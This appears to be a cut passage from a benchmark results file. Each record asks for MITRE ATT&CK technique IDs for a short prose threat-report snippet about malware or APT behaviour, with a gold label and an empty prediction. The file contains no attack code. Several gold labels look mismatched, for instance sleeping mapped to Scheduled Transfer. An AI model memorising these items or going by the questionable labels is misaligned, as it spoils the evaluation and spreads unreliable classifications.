Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tonto Team has relied on user interaction to open their malicious RTF documents.\n\t - T1204.002: User Execution - Malicious File\n- Text: 1) The malicious macro scans the victim\u2019s Outlook inbox and looks for the strings \u201c$$cpte\u201d and \u201c$$ecpte\u201d. 2) Then the macro will open a CMD shell that will execute whatever instruction / command is in between the strings. 4) The macro searches for the special strings in the \u201cDeleted Items\u201d folder to find the attacker\u2019s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: OilRig has used VBSscipt macros for execution on compromised hosts.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nMAGIC HOUND TOOLSET The Magic Hound attacks did not rely on exploit code to compromise targeted systems, instead relying on executables and Microsoft Office documents, specifically Excel and Word documents containing malicious macros", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete used multiple compiled Python scripts on the victim\u2019s system. Machete's main backdoor Machete is also written in Python.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: uses the command-line interface to execute arbitrary commands.\n\t - T1059: Command and Scripting Interpreter\n- Text: Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1070.004: Indicator Removal - File Deletion\n", "input": "\nused various types of scripting to perform operations, including Python and batch scripts. The group was observed installing Python 2.7 on a victim.", "gold": "- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. Running in RAM Cobalt Strike modules aren't stored in the file system; their executable code can only be found in RAM. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Connect to another computer using PsExec.exe (the remote access program is included in the Microsoft SysInternals suite), copy the module, and run it; delete the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed\n\t - T1219: Remote Access Software\n- Text: Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.\n\t - T1021.005: Remote Services - VNC\n- Text: Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13\n\t - T1053.002: Scheduled Task/Job - At\n\t - T1133: External Remote Services\n", "input": "\nhas a plugin for VNC and Ammyy Admin Tool.", "gold": "- T1219: Remote Access Software", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion\n\t - T1029: Scheduled Transfer\n- Text: TrickBot has used \"printf\" and file I/O loops to delay process execution as part of API hammering.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: DustySky can shutdown the infected machine.\n\t - T1529: System Shutdown/Reboot\n", "input": "\ncan sleep for a given number of seconds.", "gold": "- T1029: Scheduled Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: has a package that collects documents from any inserted USB sticks.\n\t - T1025: Data from Removable Media\n- Text: Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", "input": "\nUSBS Deletes the file created by the USB command to reverse the effect", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.\n\t - T1547: Boot or Logon Autostart Execution\n- Text: may store RC4 encrypted configuration information in the Windows Registry.\n\t - T1112: Modify Registry\n", "input": "\nNavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.\n\t - T1083: File and Directory Discovery\n- Text: Forfiles can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).\n\t - T1005: Data from Local System\n- Text: The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command\n\t - T1039: Data from Network Shared Drive\n\t - T1083: File and Directory Discovery\n", "input": "\ncreates a backdoor through which remote attackers can list contents of drives and search for files.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gather domain and account names based on all running processes Gathering account information from running processes\n\t - T1057: Process Discovery\n- Text: As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Aria-body has the ability to launch files using \"ShellExecute\".\n\t - T1106: Native API\n", "input": "\nchecks the running processes on the victim\u2019s machine.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FinFisher clears the system event logs using \" OpenEventLog/ClearEventLog APIs \".\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript\n\t - T1064: Scripting\n\t - T1027: Obfuscated Files or Information\n", "input": "\nSeveral Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s Invoke-Obfuscation framework", "gold": "- T1070: Indicator Removal\n- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1021.004: Remote Services - SSH\n\t - T1018: Remote System Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n- Text: RogueRobin establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nplaces scripts in the startup folder for persistence.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has used PowerShell for execution.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: CosmicDuke uses a keylogger.\n\t - T1056.001: Input Capture - Keylogging\n- Text: The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server\n\t - T1105: Ingress Tool Transfer\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nAs mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: If the payload determines it is not running in a sandbox, it will attempt to install itself to the system to persistently execute\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\ncan create a link to itself in the Startup folder to automatically start itself upon system restart.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.\n\t - T1203: Exploitation for Client Execution\n- Text: BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents.\n\t - T1204.002: User Execution - Malicious File\n- Text: In its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nAttached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hydraq creates a backdoor through which remote attackers can monitor processes.\n\t - T1057: Process Discovery\n- Text: MegaCortex can stop and disable services on the system.\n\t - T1489: Service Stop\n- Text: Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system.\n\t - T1007: System Service Discovery\n", "input": "\nhas used to get information on processes.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Matryoshka is capable of stealing Outlook passwords.\n\t - T1555: Credentials from Password Stores\n- Text: OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n", "input": "\nhas used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.\n\t - T1059: Command and Scripting Interpreter\n- Text: Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1505.003: Server Software Component - Web Shell\n\t - T1105: Ingress Tool Transfer\n- Text: TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nCommand Hash Command Name Description 0x0AA37987 loadconfig Runs each command specified in the configuration file (see the Configuration section)", "gold": "- T1070.006: Indicator Removal - Timestomp\n- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RDAT can take a screenshot on the infected system.\n\t - T1113: Screen Capture\n- Text: Gorgon Group has used \"-W Hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: DarkWatchman reports window names along with keylogger information to provide application context.\n\t - T1010: Application Window Discovery\n", "input": "\ntakes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Function and variable names are obfuscated. Strings are encrypted. Contain an encrypted .NET injector and one or more encrypted PE payloads. Take one argument that is the decryption key for the embedded .NET injector and PE payload(s). - Embedded .NET injector and payload(s) are encoded with Base64 and encrypted with Rijndael\n\t - T1027: Obfuscated Files or Information\n- Text: Squirrelwaffle has encrypted collected data using a XOR-based algorithm.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: PoisonIvy uses the Camellia cipher to encrypt communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nperforms XOR encryption.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Adversaries can instruct to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n\t - T1078: Valid Accounts\n- Text: Currently LockerGoga does not support any worm-like capabilities that would allow it to self-propagate by infecting additional hosts on a target network. We have observed LockerGoga moving around a network via the server message block (SMB) protocol, which indicates the actors simply manually copy files from computer to computer\n\t - T1570: Lateral Tool Transfer\n- Text: Kimsuky has used pass the hash for authentication to remote access software used in C2.\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n", "input": "\nuses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.", "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390. It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors. The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. LockHeed Recruitment Lure . The macro uses aliases to rename the APIs that it uses (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command. Additional vendors have also identified a variant that uses pcalua.exe. Additional vendors have reported on the current campaign while attributing it to Lazarus. Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nThe backdoor is a Web shell that supports server payloads for many different kinds of server-side scripting languages and contains functionality to access files, connect to a database, and open a virtual command prompt.", "gold": "- T1505.003: Server Software Component - Web Shell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor also collects some rudimentary information about the compromised computer including some basic network adapter information, system version information, and language settings\n\t - T1016: System Network Configuration Discovery\n\t - T1082: System Information Discovery\n- Text: RATANKBA runs the \"net view /domain\" and \"net view\" commands.\n\t - T1018: Remote System Discovery\n- Text: Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot\n\t - T1046: Network Service Discovery\n\t - T1112: Modify Registry\n", "input": "\nRATANKBA looking for specific IP ranges Our analysis of samples of the hack tool (HKTL_NBTSCAN.GA and HKTL_NBTSCAN.GB) indicate it as a command-line program that scans IP networks for NetBIOS information such as IP address, NetBIOS computer name, logged-in username, and MAC address\u2014with some of the information coming from the initial RATAKNBA installation", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shathak or TA551 is the name some security researchers have given to a specific distribution method that uses password-protected ZIP archives as attachments to malspam. It has used Word document templates targeting English-, Italian-, German- and Japanese-speaking recipients. Shathak/TA551 has been active at least as early as February 2019\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Frankenstein has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros.\n\t - T1204.002: User Execution - Malicious File\n- Text: has used spearphishing with an attachment to deliver files with exploits to initial victims.\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n", "input": "\nsent emails to victims with malicious Microsoft Office documents attached.", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FLIPSIDE is a simple proxy that creates an outbound RDP connection.\n\t - T1090: Proxy\n- Text: Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n- Text: MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).\n\t - T1090.002: Proxy - External Proxy\n", "input": "\nfunctions as a proxy server between the victim and C2 server.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware will actually search through the /Users/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1554: Compromise Host Software Binary\n- Text: jRAT can be configured to reconnect at certain intervals.\n\t - T1029: Scheduled Transfer\n- Text: will identify Microsoft Office documents on the victim's computer.\n\t - T1005: Data from Local System\n", "input": "\ncreates a backdoor through which remote attackers can read data from files.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible 